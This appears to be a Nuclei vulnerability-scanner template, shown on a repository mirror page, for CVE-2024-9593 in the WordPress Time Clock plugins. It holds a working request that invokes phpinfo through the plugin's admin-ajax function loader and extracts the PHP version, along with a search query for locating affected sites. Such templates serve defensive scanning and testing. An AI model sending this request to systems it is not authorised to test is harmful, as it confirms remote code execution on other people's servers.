daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2024/CVE-2024-9593.yaml

72 lines
2.3 KiB
YAML
Raw Blame History

id: CVE-2024-9593
info:
name: Time Clock <= 1.2.2 & Time Clock Pro <= 1.1.4 - Remote Code Execution
author: s4e-io
severity: high
description: |
The Time Clock plugin and Time Clock Pro plugin for WordPress are vulnerable to Remote Code Execution in versions up to, and including, 1.2.2 (for Time Clock) and 1.1.4 (for Time Clock Pro) via the 'etimeclockwp_load_function_callback' function. This allows unauthenticated attackers to execute code on the server. The invoked function's parameters cannot be specified.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/detail/time-clock-122-unauthenticated-limited-remote-code-execution
- https://nvd.nist.gov/vuln/detail/CVE-2024-9593
- https://github.com/RandomRobbieBF/CVE-2024-9593
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cve-id: CVE-2024-9593
cwe-id: CWE-94
epss-score: 0.00052
epss-percentile: 0.21567
metadata:
max-request: 2
verified: true
vendor: scott_paterson
product: time-clock & time-clock-pro
framework: wordpress
fofa-query: body="/wp-content/plugins/time-clock/" || body="/wp-content/plugins/time-clock-pro/"
tags: cve,cve2024,time-clock,wp,wordpress,wp-plugin,rce,time-clock-pro
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/time-clock")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php?action=etimeclockwp_load_function HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
function=phpinfo
matchers-condition: and
matchers:
- type: word
part: body
words:
- "PHP Extension"
- "PHP Version"
condition: and
- type: status
status:
- 200
extractors:
- type: regex
part: body
group: 1
regex:
- '>PHP Version <\/td><td class="v">([0-9.]+)'
# digest: 4a0a00473045022065893bee95b4cb863eb698bc33aef1849b6971633dc55d38e63de16d89b20d8e022100916a86a5a8ba50bef07761ba790afe74cf0ab95d95dfc115f03e95f72a607648:922c64590222798bb761d5b6d8e72950
Reference in New Issue View Git Blame Copy Permalink